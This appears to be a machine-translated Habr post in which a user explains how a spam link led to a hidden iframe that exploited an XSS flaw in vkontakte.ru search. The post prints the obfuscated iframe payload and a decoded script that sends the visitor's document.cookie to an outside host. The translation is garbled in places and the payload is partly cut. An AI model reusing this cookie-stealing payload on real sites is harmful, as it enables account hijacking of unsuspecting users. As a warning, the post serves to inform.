hello, it's not spam! I am referring to all my friends. Today, I will remove my page and I will be able to turn my words to the page . , I am under my own surname and name.wot so.And here I understand that my natural curiosity has let me down this time too. Yesterday, a similar message came to me, and of course, sitting on the opera, feeling safe and secure, I followed this link. Now go to this page ( from an unlocked browser! ), And look at the code. What do we see? A hidden floating frame is loaded in the code:
<iframe src = 'http: //%76%6b%6f%6e%74%61%6b%74%65%2e%72%75/gsearch.php? q =% 27; () ()) // \% 27; document.write (String.fromCharCode (60,115,99,114,105,112, there were still many digits separated by commas that stretched the page and for that the UFO took them. If anyone really needs them - in a personal)) //% 22;% 3C% 3E% 22) // \% 22;% 3C% 3E% 22% 3C% 3E% 22% 22! ---% 22?% 3E # c [q] =% 27% 3B () ()) % 20% 20 \ & c [section] = people 'style =' display: none; '> </ iframe>The link leads to the “lencode” for “vkontakte.ru”, to the script that performs the search. As you know, after the search procedure, the text of the request is displayed back to the user, this (as well as the lack of proper filtering) and the spammers used in this case.
<script> document.write ('<iframe src = "http://webzer.vov.ru/s.php?dc='+document.cookie+'" style = "display: none;"> </ iframe> ' ); </ script>This is actually a sniffer, to which some interesting users like me fly to vkontakte.
Source: https://habr.com/ru/post/62283/
All Articles